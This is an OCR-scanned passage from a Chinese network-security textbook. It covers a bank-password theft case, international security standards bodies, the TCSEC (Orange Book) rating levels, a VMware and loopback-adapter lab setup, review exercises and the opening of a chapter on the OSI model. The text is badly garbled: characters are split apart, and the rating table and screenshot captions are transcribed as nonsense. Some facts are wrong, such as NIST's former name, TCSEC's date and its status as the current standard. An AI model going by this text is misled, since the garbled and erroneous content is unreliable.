款 至 台湾 人 头 账户 ， 最 后 由 他 人 在 大 陆 的 ATM 提 款 机 提 领 现金 ， 借 此 逃避 警方 巡查 ， 警 
方 发 现 ， 被 害 客户 中 甚至 有 存款 金额 高 达 新 台币 2 亿 元 者 。 

警方 说 ， 据 陈 崇 顺 估 计 ， 自 2004 年 2 月 至 2004 年 6 月 ， 至 少 已 得 手 约 数 十 万 笔 民众 
账户 密码 , 但 警方 查 到 的 只 有 数 万 笔 而 已 , 陈 崇 顺 对 此 供 称 其 中 约 10 万 笔 网 络 银行 账户 密 
码 已 转交 给 大 陆 黑 客 使 用 ， 伺 机 盗 领 存款 ， 自 己 未 留 备份 ， 所 以 不 在 他 的 数据 库 中 。 


1.4 网 络 安全 标准 


国际 上 信息 安全 标准 化 工作 兴起 于 20 世纪 70 年 代 中 期 ，20 世纪 80 年 代 有 了 较 快 的 
发 展 ，20 世纪 90 年 代 引 起 了 世界 各 国 的 普遍 关注 。 目 前 ， 国 际 上 与 信息 安全 标准 化 有 关 
的 组 织 主要 有 国际 标准 化 组 织 〈ISO )、 国 际 电工 委员 会 (IEC)、 美 国 国家 标准 和 技术 研究 
所 (NIST)、 国 际 电信 联盟 CITU) 和 互联 网 工程 任务 组 (IETF)。 国 内 的 安全 标准 组 织 主 
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要 有 信息 技术 安全 标准 化 技术 委员 会 (CITS) 及 中 国 通信 标准 化 协会 (CCSA) 下 的 网 络 
与 信息 安全 技术 工作 委员 会 。 
1. 国际 标准 化 组 织 
国际 标准 化 组 织 始 建 于 1946 年 ， 是 世界 上 最 大 的 非 政府 性 标准 化 专门 机 构 ， 它 在 国 
际 标准 化 中 占有 主导 地 位 。ISO 的 主要 活动 是 制定 国际 标准 ， 协 调 世 界 范围 内 的 标准 化 工 
作 ， 组 织 各 成 员 国 和 技术 委员 会 进行 交流 ， 以 及 与 其 他 国际 性 组 织 进行 合作 ， 共 同 研究 有 
关 标 准 问 题 。 随 着 人 们 对 安全 的 不 断 重视 ， 世 界 各 地 的 许多 企业 、 政 府 机 构 和 其 他 组 织 把 
获得 ISO 17799 认证 作为 目标 .ISO 17799 提供 了 一 个 方便 的 框架 以 便 安全 策略 制定 者 能 够 
依据 国际 标准 构建 自己 的 策略 。 
2. 国际 电工 委员 会 
国际 电工 委员 会 (IEC) 是 世界 上 成 立 最 早 的 非 政府 性 国际 电工 标准 化 机 构 ， 是 联合 
国 经 社 理事 会 的 甲 级 咨询 组 织 。IEC 在 信息 安全 标准 化 方面 除了 与 ISO 联合 成 立 了 JTC1 
分 委员 会 外 ， 还 在 电信 、 电 子 系 统 、 信 息 技术 和 电磁 兼容 等 方面 成 立 了 技术 委员 会 ， 并 且 
制定 了 相关 国际 标准 ， 如 信息 技术 设备 安全 IEC60950 等 。 
3. 美国 国家 标准 和 技术 研究 所 
美国 国家 标准 和 技术 研究 所 (NIST) 成 立 于 1901 年 ， 原 名 美国 国家 标准 局 (NDS)， 
1988 年 8 月 ， 经 美国 总 统 批准 更 名 为 美国 国家 标准 和 技术 研究 所 。 NIST 已 经 发 行 了 大 量 
的 美国 联邦 信息 处 理 标准 出 版 物 和 特别 公告 ， 这 些 公 告 对 安全 管理 者 、 设 计 者 和 实施 者 非 
常 有 用 。 其 中 ，FIPS PUB 200 (美国 联邦 信息 与 信息 系统 最 低 安全 需求 ) 规定 了 17 个 与 安 
全 相关 领域 的 最 低 安全 需求 。 
4. 国际 电信 联盟 
国际 电信 联盟 CITU) 于 1865 年 5 月 在 巴黎 成 立 , 1947 年 成 为 联合 国 的 专门 机 构 。ITU 
是 世界 各 国政 府 的 电信 主管 部 门 之 间 协 调 电信 事务 的 一 个 国际 组 织 ， 它 研究 制定 有 关 电 信 
业务 的 规章 制度 ， 通 过 决议 提出 推荐 标准 ， 收 集 有 关 情 报 。 其 中 ， 国 际 电信 联盟 电信 标准 
化 部 门 (ITU-T) 已 经 发 布 了 X.800 系列 的 推荐 标准 ， 其 内 容 覆 盖 了 数据 网 络 的 安全 ， 它 
对 安全 威胁 、 安 全 服务 和 安全 机 制 做 了 一 个 详细 的 概述 。 
S. 互联 网 工程 任务 组 
互联 网 工程 任务 组 (IETF) 成立 于 1985 年 底 ， 其 主要 任务 是 负责 互联 网 相关 技术 规 
范 的 研发 和 制定 。 目 前 ，IETF 已 成 为 全 球 互联 网 界 最 具 权 威 的 大 型 技术 研究 组 织 。IETF 
分 成 8 个 工作 组 ， 分 别 负责 Internet 路 由 、 传 输 、 应 用 等 8 个 领域 ， 其 著名 的 IKE 和 IPSec 
都 在 RFC 系列 之 中 ， 还 有 电子 邮件 、 网 络 认 证 和 密码 及 其 他 安全 协议 标准 。 
6. 信息 技术 安全 标准 化 技术 委员 会 
信息 技术 安全 标准 化 技术 委员 会 (CITS) 成 立 于 1984 年 ， 在 国家 标准 化 管理 委员 会 
和 原 信息 产业 部 的 共同 领导 下 , 负责 全 国信 息 技术 领域 及 与 ISO/TEC JTC1 相对 应 的 标准 化 
工作 , 目前 下 设 24 个 分 技术 委员 会 和 特别 工作 组 ， 是 国内 最 大 的 标准 化 技术 委员 会 ,也 是 
具有 广泛 代表 性 、 权 威 性 的 信息 安全 标准 化 组 织 。CITS 主要 负责 信息 安全 的 通用 框架 、 方 
法 、 技 术 和 机 制 的 标准 化 及 国内 外 对 应 的 标准 化 工作 ， 其 中 技术 安全 包括 开放 式 安全 体系 
结构 、 各 种 安全 信息 交换 的 语义 规则 、 有 关 的 应 用 程序 接口 和 协议 引用 安全 功能 的 接口 等 。 
7. 中 国 通信 标准 化 协会 
中 国 通信 标准 化 协会 (CCSA) 成 立 于 2002 年 ， 是 国内 企 事 业 单 位 自愿 联合 组 织 起 来 
经 业务 主管 部 门 批准 的 开展 通信 技术 领域 标准 化 活动 的 组 织 。 CCSA 下 设 了 有 线 网 络 信息 


安全 、 无 线 网 络 信息 安全 、 安 全 管理 和 安全 基础 设施 4 个 工作 组 ， 负 责 研究 有 线 网 络 中 电 
话 网 、 互 联网 、 传 输 网 、 接 入 网 等 在 内 所 有 电信 网 络 相关 的 安全 标准 ;无线 网 络 中 接 入 、 
核心 网 、 业 务 等 相关 的 安全 标准 及 安全 管理 工作 ;安全 基础 设施 工作 组 中 网 络 管理 安全 及 
与 安全 基础 设施 相关 的 标准 。 


1.5 网 络 安全 的 评估 标准 


为 实现 对 网 络 安全 的 定性 评价 ， 美 国 国防 部 所 属 的 国家 计算 机 安全 中 心 (NCSC) 在 
20 世纪 90 年 代 提 供 了 网 络 安全 性 标准 (DoD5200.28 一 STD),， 即 可 信任 计算 机 标准 评估 准 
则 (Trusted Computer Standards Evaluation Criteria, TCSEC), 也 叫 橘 黄皮书 (Orange Book)。 
该 标准 认为 要 使 系统 免 受 攻 击 ， 对 应 不 同 的 安全 级 别 ， 硬 件 、 软 件 和 存储 的 信息 应 实施 不 
同 的 安全 保护 。 安 全 级 别 对 不 同类 型 的 物理 安全 、 用 户 身份 验证 、 操 作 系统 软件 的 可 信任 
性 和 用 户 应 用 程序 进行 了 安全 描述 。 

目前 ，TCSEC 已 经 成 为 了 现行 的 网 络 安全 标准 。 

TCSEC 将 网 络 安全 性 等 级 划分 为 A、B、C、D 4 类 共 7 级 , 其 中 , A 类 安全 等 级 最 高 ， 
D 类 安全 等 级 最 低 。 

1. D 级 

D 级 也 称 为 酌情 安全 保护 ， 是 可 用 的 最 低 安 全 形式 。 该 标准 说 明 整 个 系统 都 是 不 可 信 
任 的 。 对 硬件 来 说 ， 没 有 任何 保护 ， 操 作 系统 容易 受到 损害 ， 对 于 用 户 和 他 们 对 存储 在 计 
算 机 上 信息 的 访问 权限 没有 身份 认证 。 

2.C1 级 

C 级 有 两 个 安全 子 级 别 , 即 Cl 和 C2, 也 称 为 自选 安全 保护 系统 , 它 描 述 了 一 个 UNIX 
系统 上 可 用 的 级 别 。 对 硬件 来 说 ， 存 在 某 种 程度 的 保护 ， 因 为 它 不 再 那么 容易 受到 损害 ， 
尽管 这 种 可 能 性 存在 。 用 户 必 须 通 过 用 户 注 册 名 和 口令 系统 识别 自己 ， 用 这 种 方式 来 确定 
每 个 用 户 对 程序 和 信息 拥有 什么 样 的 访问 权限 。 

3. C2 级 

除 C1 级 包含 的 特征 外 ，C2 级 还 包括 其 他 的 创建 受 控 访问 环境 的 安全 特性 ， 该 环境 具 
有 进一步 限制 用 户 执行 某 些 命令 或 访问 某 些 文件 的 能 力 。 这 不 仅 基于 许可 权限 ， 而 且 基 于 
身份 验证 级 别 ， 另 外 ， 这 种 安全 级 别 要 求 对 系统 加 以 审核 ， 审 核 可 用 来 跟踪 记录 所 有 与 安 
全 有 关 的 事件 ， 比 如 哪些 是 由 系统 管理 员 执 行 的 活动 。 

4. Bl1 级 

B 级 也 称 为 被 标签 的 安全 性 保护 ， 分 为 三 个 子 级 别 。B1 级 或 称 为 标准 安全 保护 ， 是 支 
持 多 级 安全 的 第 一 个 级 别 ， 这 一 级 说 明了 一 个 处 于 强制 性 访问 控制 之 下 的 对 象 ， 不 允许 文 
件 的 拥有 者 改变 其 许可 权限 。 

5. B2 级 

B2 级 也 称 为 结构 保护 , 要 求 计 算 机 系统 中 所 有 对 和 象 都 加 标签 , 而 且 给 设备 分 配 单个 或 
多 个 安全 级 别 。 这 是 提出 的 较 高 安全 级 别 的 对 象 与 男 一 个 较 低 安全 级 别 的 对 象 相互 通信 的 
第 一 个 级 别 。 

6. B3 级 

B3 级 也 称 为 安全 域 级 别 ,使 用 安装 硬件 的 办 法 来 加 强 域 , 例如， 内 存 管理 硬件 用 来 保 
护 安全 域 免 遭 无 授权 访问 或 其 他 安全 域 对 象 的 修改 。 该 级 别 也 要 求 用 户 终端 通过 一 条 可 信 
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任 途 径 连接 到 系统 上 。 

7. A 级 

A 级 也 称 为 验证 设计 ， 是 当前 桥 黄 皮 书 中 的 最 高 级 别 ， 包 含 了 一 个 严格 的 设计 、 控 制 
和 验证 过 程 。 与 前 面 提 到 的 各 级 别 一 样 ， 这 一 级 包含 了 较 低 级 别 的 所 有 特性 ， 其 设计 必须 
是 从 数学 上 经 过 验证 的 ， 而 且 必须 进行 对 秘密 通道 和 可 信任 分 布 的 分 析 。 

橘 黄 皮 书 安全 系统 分 类 总 结 如 表 1-4 所 示 。 


表 1-4 橘 黄皮书 安全 系统 分 类 


评估 标准 Cl | cz | B | B3 A 
安全 策略 

直接 访问 控制 y v VY 
目标 重 y 

标签 | | v 
标签 完整 性 y 

被 标识 信息 输出 


多 层 设备 输出 
单 层 设备 输出 
标记 人 可 读 输 出 
强制 访问 控制 
目标 敏感 标签 


| | 

| 

| | 

| | 

EE 
设备 标签 Es 
可 说 明 性 [| 1 | | | 
确认 扩 权 
审计 | | | | | | x Y 
可 信和 路 多 | | | | Tv | 
保险 | | | | | 
系统 体系 V V V 4 
系统 完整 性 V 
安全 测试 V V/ y ~ 
设计 说 明和 确认 | | | | YY | | y 
隐秘 通道 分 析 V V V 
可 信 装 置 管理 V ~ 
配置 管理 V V 
可 信 恢 复 + 
可 信 分 发 Y 
文献 
安全 特性 用 户 指南 J 
可 信 装 置 手册 V V V V V 
测试 文档 | 


注 :“ V ”表示 本 级 有 些 新 的 或 比 对 低 一 级 更 强 的 需求 


1.6 ”实验 环境 配置 


网 络 安全 是 一 门 实践 性 很 强 的 学 科 ， 每 部 分 内 容 都 会 包括 许多 实验 ， 由 于 实验 需要 在 
网 络 环境 下 完成 ,同时 一 些 实验 具有 攻击 性 和 破坏 性 ， 所 以 ,建议 在 计算 机 中 安装 虚拟 机 ， 
并 且 真 实 机 和 虚拟 机 可 以 通过 以 太 网 进行 通信 ， 形 成 一 个 小 型 的 局 域 网 环境 。 


1.6.1 虚拟 机 概述 


虚拟 机 ,实际 上 是 指 一 款 可 以 虚拟 出 一 人 台 或 多 台 计 算 机 的 软件 (由 若干 个 磁盘 文件 虚拟 
各 种 计算 机 硬件 设备 )。 这 人 台 虚 拟 的 计算 机 具备 真实 计算 机 几乎 所 有 的 功能 ， 包 括 开机 、 关 
机 、 重 新 启动 等 物理 功能 。 可 以 在 上 面 安装 操作 系统 、 安 装 应 用 程序 、 访 问 网 络 资源 等 。 对 
于 用 户 而 言 ， 它 只 是 运行 在 物理 计算 机 上 的 一 个 应 用 程序 , 但 是 对 于 在 虚拟 机 中 运行 的 应 用 
程序 而 言 ， 它 就 像 是 在 真正 的 计算 机 中 运行 工作 一 样 。 也 就 是 说 ， 我 们 可 以 把 虚拟 机 当成 真 
正 的 计算 机 来 使 用 ， 但 是 它 只 是 磁盘 上 的 文件 虚拟 出 来 的 ， 所 以 无 论 进行 任何 操作 ， 包 括 硬 
盘 格式 化 、 运 行 病毒 等 危险 操作 ， 都 不 会 对 真实 物理 硬件 以 及 真实 计算 机 造成 任何 危害 。 


1.6.2 安装 虚拟 机 


首先 在 真实 机 上 安装 一 个 虚拟 机 软件 VMware， 它 是 虚拟 PC 软件 ， 可 在 一 台 机 器 上 
同时 运行 多 个 系统 ， 需 要 根据 真实 机 的 操作 系统 版 本 选择 相应 的 VMware 程序 版 本 ， 这 里 
演示 安装 的 是 Windows 7 操作 系统 中 适用 的 VMware Workstation 7.1, 运行 安装 程序 后 ,出 
现 的 安装 界面 如 图 1-5 所 示 。 


Welcome to the installation wizard for VMware 
Workstation 


The installation wizard wil alow you to modify, repair, or remove 
VMware Workstation, To continue, dick Next. 


WARNING: This program is protected by copyright law and 
international treaties, 


VMware 
。 按 软件 默认 , 单 击 Next 按钮 即 可 


图 1-5 VMware 欢迎 界面 


接 下 来 的 几 步 均 按照 系统 的 默认 选项 设置 , 安装 后 系统 提示 重新 启动 计算 机 , 重启 后 ， 
打开 VMware 程序 ， 主 界面 如 图 1-6 所 示 。 


同 经 颁 会 稻 芝 


击 一 疏 


克 参 颁 会 扩大 再 雁 与 笑 夏 


文件 (9 篇 六 (二 看 M) 二 SiM) 分 组 (窗口 WW) 天 且 H) 
上》 轩 通商 硬 | 回国 加 外 | 回 可 男 | 丁丁 


VMware Workstation 


Dy 


种 关 部 四 之 后 你 便 可 以 在 该 虚拟 机 中 安 
新 建 虚拟 机 


Be 


和 
地 站 


图 1-6 VMware 主 界面 


安装 完 虚 拟 机 以 后 ， 就 如 同 组 装 了 一 台 计 算 机 ， 需 要 给 这 人 台 计 算 机 安装 操作 系统 ， 可 
以 选择 菜单 栏 “ 文 件 ” 下 的 “新 建 ” 菜 单项 ， 再 选择 “虚拟 机 ”选项 ， 给 虚拟 机 安装 新 的 
操作 系统 ， 如 图 1-7 所 示 。 


[文件 (月 编 强 (E) 查看 (V) 志 拟 机 (M) ”分 组 (T) 。 瘟 口 W) 帮助 (H) 


打开 (O)... 
导入 或 导出 [D… 
连接 到 ACE 管理 服务 器 (A)… 
关闭 (O 
映射 虚拟 磁盘 或 与 虚拟 磁盘 新 开 连 接 (M)… 
添加 到 收藏 夫 ( 月 
以 在 该 虚拟 机 中 安 。 | 选择 菜单 栏 “文件 ” 
es 下 的 新建? 菜单 项 ， 
再 选择 “虚拟 机 ” 选 


ER ce dd 


新 分 组 


区 
本 


图 1-7 安装 操作 系统 


由 于 许多 实验 具有 破坏 性 ， 可 能 导致 虚拟 机 操作 系统 崩溃 ， 建 议 使 用 已 安装 好 的 操作 
系统 直接 打开 ， 方 便 今 后 实验 可 以 多 次 使 用 ， 选 择 菜单 栏 “ 文 件 ” 下 的 “打开 ”菜单 项 ， 
在 “打开 ”对 话 框 中 找到 虚拟 机 操作 系统 文件 ， 如 图 1-8 所 示 。 


=。 和 他 个 改 日 区 we 
| 国 Windows 2000 Advanced Servervmx 。 2011171251219 VMware wi 


图 1-8 “打开 ”文件 对 话 框 


单 击 图 1-8 中 的 “打开 ”按钮 ， 即 可 启动 虚拟 机 ， 相 当 于 是 一 个 独立 的 计算 机 。 为 了 
使 所 有 的 网 络 安全 攻防 实验 都 可 以 成 功 完成 ， 建 议 在 虚拟 机 上 安装 没有 打 过 任何 补丁 的 
Windows 2000 Advanced Server。 虚 拟 机 上 的 操作 系统 如 图 1-9 所 示 。 


;六 伯 (R。 纺 妆 二 看 WV) 志 世 机 (M) 分 组 宣 口 W) 帮助 H) 
昌国 加 回 回归 | 口上 回国 名 负 


号 Windows 2000 Advanced -x 


可 入 二 扩 机 ， 证 芭 针尖 半 到 时 而 或 廊 Cul+6。 加 加 日 加 网 自 | 画 


图 1-9 虚拟 机 上 的 操作 系统 


RS 


地 一 四 


克 络 人 妆 会 志 过 


克 参 颁 会 其 大 理 雁 与 入 路 


这 样 ， 在 一 台 计 算 机 上 就 有 了 两 个 操作 系统 ， 这 里 分 别称 它们 为 真实 机 (真实 计算 机 
中 的 操作 系统 ) 和 虚拟 机 (虚拟 机 中 的 操作 系统 )。 


1.6.3 安装 回环 网 卡 


如 果 要 将 真实 机 和 虚拟 机 组 成 一 个 局 域 网 ， 需 要 在 真实 机 中 安装 回环 网 卡 ， 打 开 任务 
管理 器 ， 选 择 菜 单 栏 “操作 ”下 的 “添加 过 时 硬件 ”菜单 项 ， 如 图 1-10 所 示 。 


站 EX 
全 设备 管理 六 = 一 -一 


图 1-10 “设备 管理 器 ”面板 


进入 到 “添加 硬件 ”操作 界面 ， 单 击 “ 下 一 步 ” 按 钮 ， 如 图 1-11 所 示 。 


欢迎 使 用 添加 硬件 向 导 


该 向 导 构 帮助 您 安装 双 动 程序 软件 ， 以 支持 不 支持 即 插 即 用 以 及 
Windows 无 法 后 动 IR 中 的 较 老 的 设备 . 


如 果 您 是 高 级 用 户 ， 或 者 技术 支持 指导 您 来 到 此 处 ， 则 只 应 使 用 
该 向 导 . 


全 如 果 硬 件 带 安装 CD ， 建议 您 单 去 “取消 ”， 关 闭 这 个 向 
导 , 用 制造 商 的 CD 来 安装 这 个 硬件 . 


Es ED 


图 1-11 “添加 硬件 ”操作 界面 


选择 “安装 我 手动 从 列表 选择 的 硬件 ”一 项 ， 然 后 单 击 “下 一 步 ” 按 钮 ， 如 图 1-12 
所 示 。 


这 个 向 导 可 以 帮助 您 安装 其 他 硬件 


这 个 向 导 可 以 搜索 其 他 硬件 并 为 您 生动 安装 。 或 者 ， 如 果 钨 知道 要 安装 万 个 型 号 的 硬件 , 您 
可 以 从 列表 选择 . 


您 理 向 导 做 什么 ? 
个 搜索 并 自动 安装 硬件 (推荐 )(S) 


我 手 动 从 列表 选择 的 硬件 (高 级 )(M) 


i 
图 1-12 选择 安装 手动 添加 硬件 


在 选择 要 安装 的 硬件 类 型 中 选择 网 络 适配器 ， 然 后 单 击 “ 下 一 步 ”按钮 ， 如 图 1-13 


图 1-13 选择 安装 的 硬件 类 型 


地 一 如 


克 络 作 会 志 过 


克 参 颁 会 其 大 再 雁 与 笑 路 


选择 厂商 Microsoft 的 网 络 适配器 中 的 Microsoft Loopback Adapter， 青 单 击 “下 一 步 ” 
按钮 ， 如 图 1-14 所 示 。 


选择 网 络 适配器 


单 击 与 硬件 相符 的 网 络 适 配器 ， 然 后 单 去 “下 一 步 ”。 如 果 您 有 这 个 功能 的 安装 磁盘 ， 请 单 主 
“从 磁盘 安装 ”。 


Intel 
Intel Corporatioy 
Microsoft 


图 1-14 选择 网 络 适配器 
添加 硬件 向 导 开 始 安装 回环 网 卡 ， 这 里 可 能 需要 几 秒 钟 时 间 ， 如 图 1-15 所 示 。 


向 导 正 在 安装 软件 ， 请 销假- - - 


Microsoft Loopback Adapter 


区 


图 1-15 向 导 正 在 安装 软件 


安装 成 功 后 ， 单 击 “ 完 成 ”按钮 ， 结 束 回环 网 卡 安装 过 程 ， 如 图 1-16 所 示 。 


正在 完成 添加 硬件 向 导 


安装 了 下 列 硬件 : 
Mi Microsoft Loopback Adapter 
a 


Windows 已 完成 为 这 个 设备 安装 软件 . 


车 要 关闭 此 向 导 ， 请 单 主 “ 完 成 ”。 


1.6.4 配置 网 络 
真实 机 回环 网 卡 安装 成 功 


图 1-16 安装 完成 


段 ， 这 样 真实 机 和 虚拟 机 便 形成 了 一 个 局 域 网 ， 可 以 进行 通信 。 
配置 真实 机 的 回环 网 卡 的 属性 ，IPv4 协议 中 的 下 地 址 为 : 


所 示 。 


| 网络 | 共享 | 


连接 时 使 用 ; 
蔚 Microsoft Loopback Adapter 


此 连接 使 用 下 列 项 目 0) 


后 , 分 别 配置 真实 机 和 虚拟 机 的 他 地 址 , 二 者 需要 在 同一 网 


192.168.8.112， 如 图 1-17 


上 自动 获得 IP 地 址 @) 


回 局 icroseft 网 络 的 文件 和 打印 机 共享 
回 < 可靠 多 播 协议 
BE Internet Le 6 (CP/IPYE) 


回 二 反观 必 应 查 序 


回 使 用 下 面 的 IP 地 址 (5) 
IP 地 址 GD 
子 网 撞 码 人 : 
默认 网 关 0) 


自动 获得 DNS 服务 器 地 址 B) 


4 而 


安装 0)... 部 载 0) 


描述 
ee ter 


首选 DRS 服务 器 fF) 
备用 DRS 服务 器 OA) 


固 退 出 8 验证 设置 0) 


em 


加 使 用 下 面 的 DNS 服务 器 地 址 到 ) 


192 .168 . 8 .112 
255 .255 .255 . 0 


[CL 冲 ][ 聘 


图 1-17 配置 真实 机 卫 地 址 


克 络 多 会 花 灰 理 治 与 侨 践 


配置 虚拟 机 的 卫 地 址 为 : 192.168.8.212， 如 图 1-18 所 示 。 


: 文件 (有 ”编辑 (E) ”查看 (V) ”虚拟 机 (M) ”分 组 (1 窗口 (W) ”帮助 (H) 
时 用 [国人 固 回 回 中 | 回回 国名 负 


| 本 地 连接 尾 性 Internet 协议 (TCP/IP) 尾 性 


到 4 


连 按 时 合用 ， 则 可 以 半 取 自 设置, 否则 ， 
[ET 人 


个 自动 获得 IP 地 址 @) 
三 使 用 下 面 的 IF 地 址 (3); 
IF 地 址 加 ): 
子 网 掩 码 o) : 
默认 网 关 @): 


Ts2 .168 . 8 .212 


255 .255 .255 . 0 


此 连接 使 用 下 列 选 定 的 组 件 @) 


Mi erosoft 网 络 的 文件 和 打印 机 
加 六 NetBEVT Protocol 
MY 于 Internet 协议 (TCP/IP) 


安装 四..， | 着 载 | 


I 
TCR 了 是 默认 的 广域网 协议 。 它 提供 


从 自动 获得 DHS 服务 器 地 址 中 ) 
一 使 用 下 面 的 DNS 服务 器 地 址 EE): 一 一 一 一 
首选 DNS 服务 器 到 ) 。 L 

备用 DNS 服务 器 ): 


厂 连接 后 在 任务 栏 中 显示 图 标 他 ) 


要 直 按 纺 入 到 这 虚拟 机 ， Ce Ctrl+G。 


图 1-18 配置 虚拟 机 下 地 址 


利用 ping 指令 来 测试 网 络 是 否 连通 。 在 真实 机 的 DOS 窗口 中 输入 “ping 


192.168.8.212”, 


如 图 1-19 所 示 。 


EF 在 Ping 192.168.8.212 
192.168.8.212 的 
192.168.8.212 的 
192.168.8.212 的 


时 间 = 4ms TTL:128 
时 间 =8ms TTL=128 
时 间 <1ms TTL=128 


回回 固 匹 


来 自 192.168.8.212 的 


192.168.8.212 的 ping 
已 发 送 = 


数据 包 : 已 描 
an 中 可 从 


= gms， 最 长 = 


时 间 <1ms TTL=128 


， 竺 失 : 9 (8% 丢失 )， 


A 


图 1-19 测试 真实 机 与 虚拟 机 是 否 连通 


测试 结果 表明 真实 机 和 虚拟 机 是 连通 的 ， 这 样 一 个 虚拟 的 小 型 局 域 网 络 环境 就 构建 完 
成 ， 即 网 络 安全 实验 环境 配置 完成 。 


思考 与 练习 


1. 简 述 网 络 安全 防范 体系 层次 及 各 层 反 映 的 安全 问题 。 

2. 分 别 举 出 现实 生活 中 的 实例 ， 说 明 研 究 网 络 安全 与 政治 、 经 济 、 军 事 和 社会 稳定 
的 联系 。 

3. 为 什么 说 操作 系统 的 安全 是 整个 网 络 安全 的 基础 ? 

4. 结合 我 国信 息 网 络 安全 法 律 法 规 的 特点 以 及 我 国 现行 信息 网 络 安全 法 律 法 规 中 存 
在 的 问题 ， 试 思考 应 该 如 何不 断 地 完善 我 国信 息 网 络 安全 法 律 体系 。 

5. 试 分 析 及 举例 说 明 ， 在 网 络 安全 体系 中 ， 技 术 和 管理 哪个 更 重要 。 

6. 使 用 Sniffer 抓 取 真实 机 到 虚拟 机 的 数据 包 ， 并 做 简要 的 分 析 (上 机 完成 )。 

7. 在 安全 领域 中 ， 除 了 采用 密码 技术 的 防护 措施 之 外 ， 还 有 哪些 防护 措施 ? 


克 络 人 委 会 友 过 


二 一 恰 


第 2 章 网 络 安全 基础 


本 章 学 习 目 标 : 

。 了 解 OSI 参考 模型 各 层 的 主要 功能 ; 

。 熟悉 IP、ICMP、ARP、TCP 和 UDP 协议 ; 
。 理解 和 掌握 常用 的 网 络 命令 和 网 络 服务 。 


2.1 OSI 参考 模型 


OSI(Open System Interconnection， 开 放 系统 互 连 ) 参考 模型 是 由 国际 标准 化 组 织 ISO 
制定 的 标准 化 开放 式 系统 互 连 参考 模型 ， 是 一 个 逻辑 上 的 定义 ， 一 个 规范 ， 它 把 网 络 从 由 
辑 上 分 为 了 7 层 ， 每 一 层 都 有 相关 、 相 对 应 的 物理 设备 。 它 的 最 大 优点 是 将 服务 、 接 口 和 
协议 这 三 个 概念 明确 地 区 分 开 来 ， 通 过 7 个 层次 化 的 结构 模型 使 不 同 的 系统 不 同 的 网 络 之 


间 实 现 可 靠 的 通信 。 图 2-1 是 OSI 参考 模型 的 7 层 结构 。 和 人 第 7 层 
1， 物 理 层 应 用 层 
物理 层 是 OSI 参考 模型 的 最 低层 或 第 1 层 ， 该 层 包 括 这 未 层 
物理 连 网 媒介 ， 如 电线 连 线 连接 器 。 物 理 层 的 协议 产生 并 人 EE 
检测 电压 以 便 发 送 和 接收 携带 数据 的 信号 ， 就 是 在 通信 信 传输 层 
道上 传输 原始 的 数据 位 ， 即 相当 于 “信息 实际 如 何 传送 ”。 网 络 层 
2. 链 路 层 链 路 层 
链 路 层 是 OSI 参考 模型 的 第 2 层 ， 它 控制 网 络 层 与 物 物理 层 第 1 层 


理 层 之 间 的 通信 。 它 的 主要 功能 是 如 何在 不 可 靠 的 物理 线 
路 上 进行 数据 的 可 靠 传递 ， 就 是 在 物理 链 路 上 无 差错 地 传 
送 数据 帧 ， 即 相当 于 “每 一 步 该 怎么 走 ”。 
3， 网 络 层 
网 络 层 是 OSI 参考 模型 的 第 3 层 , 它 的 主要 功能 是 将 网 络 地 址 翻译 成 对 应 的 物理 地 址 ， 
决定 如 何 将 数据 从 发 送 方 路 由 到 接收 方 , 就 是 完成 分 组 传送 、 路 由 选择 和 网 络 管理 工作 ， 
即 相当 于 “数据 如 何 到 达 对 方 ”。 
4. 传输 层 
传输 层 是 OSI 参考 模型 的 第 4 层 ， 也 是 最 重要 的 一 层 。 传 输 协议 同时 进行 流量 控制 或 
是 基于 接收 方 可 接收 数据 的 快慢 程度 规定 适当 的 发 送 速 率 ， 除 此 之 外 ， 传 输 层 按照 网 络 能 
处 理 的 最 大 尺寸 将 较 长 的 数据 包 进行 强制 分 割 。 传 输 层 的 主要 工作 就 是 从 端 到 端 经 网 络 透 
明 地 传送 报 文 ， 即 相当 于 “对 方 在 何 处 ”。 


图 2-1 OSI 参考 模型 


S. 会 话 层 

会 话 层 是 OSI 参考 模型 的 第 5 层 , 负责 在 网 络 中 的 两 节点 之 间 建 立 、 维 持 和 终止 通信 。 
会 话 层 的 功能 包括 建立 通信 连接 、 保 持 会 话 过 程 通信 连接 的 畅通 、 同 步 两 个 节点 之 间 的 对 
话 、 决 定 通信 是 否 被 中 断 以 及 通信 中 断 时 决定 从 何 处 重新 发 送 ， 简 单 地 说 ， 会 话 层 就 是 完 
成 会 话 的 管理 与 数据 传输 的 同步 工作 ， 即 相当 于 “如 何 检查 ”。 


6， 表示 层 

表示 层 是 OSI 参考 模型 的 第 6 层 ， 它 是 应 用 程序 和 网 络 之 间 的 翻译 官 ， 在 表示 层 ， 数 
据 将 按照 网 络 能 理解 的 方案 进行 格式 化 ， 这 种 格式 化 也 因 所 使 用 网 络 的 类 型 不 同 而 不 同 。 
表示 层 的 主要 工作 就 是 关心 传递 数据 的 语法 与 语义 ， 即 相当 于 “ 像 什么 ”。 

7. 应 用 层 


应 用 层 是 OSI 参考 模型 的 第 7 层 ， 负 责 对 软件 提供 接口 以 使 程序 能 使 用 网 络 服务 ， 就 
是 包含 直接 针对 用 户 需 要 的 协议 ， 即 相当 于 “做 什么 ”。 

OSI 参考 模型 作为 一 个 开放 网 络 通信 协议 簇 的 工业 标准 ， 很 容易 实现 不 同 网 络 技术 的 
互联 和 互 操作 。 但 是 ， 由 于 实现 所 有 的 7 层 模型 过 于 复杂 ， 效 率 也 低 ， 因 此 很 少 有 产品 完 
全 符合 OSI 参考 模型 。 


2.2 ” TCP/IP 协议 簇 


TCP/IP 是 用 于 计算 机 通信 的 一 组 协议 , 通常 称 它 为 TCP/IP 协议 徐 , 采用 TCP/IP 协议 
通过 互联 网 传送 信息 可 减少 网 络 中 的 传输 阻塞 ， 方 便 大 批量 的 数据 在 网 上 传输 ， 从 而 提高 
网 络 的 传输 效率 。TCP/IP 协议 簇 中 包括 上 百 个 互 为 关联 的 协议 , 例如 ICMP、ARP/RARP、 
UDP、FTP、HTTP、SMTP 等 协议 ， 而 TCP 协议 和 卫 协议 是 保证 数据 完整 传输 的 两 个 最 
基本 的 重要 协议 。 

1. TCP/IP 的 层次 结构 

从 协议 分 层 模 型 方面 来 讲 ，TCP/IP 由 4 个 层次 组 成 ， 分 别 是 网 络 接口 层 、 网 络 层 、 传 
输 层 和 应 用 层 。 

1) 网 络 接口 层 

网 络 接口 层 把 数据 链 路 层 和 物理 层 放 在 一 起 ， 对 应 TCP/IP 概念 模型 的 网 络 接口 。 对 
应 的 网 络 协议 主要 是 PPP (Point-to-Point Protocol， 点 对 点 协议 )、HDLC (High Level Data 
Link Control， 高 级 链 路 控制 协议 ) 等 。 

2) 网 络 层 

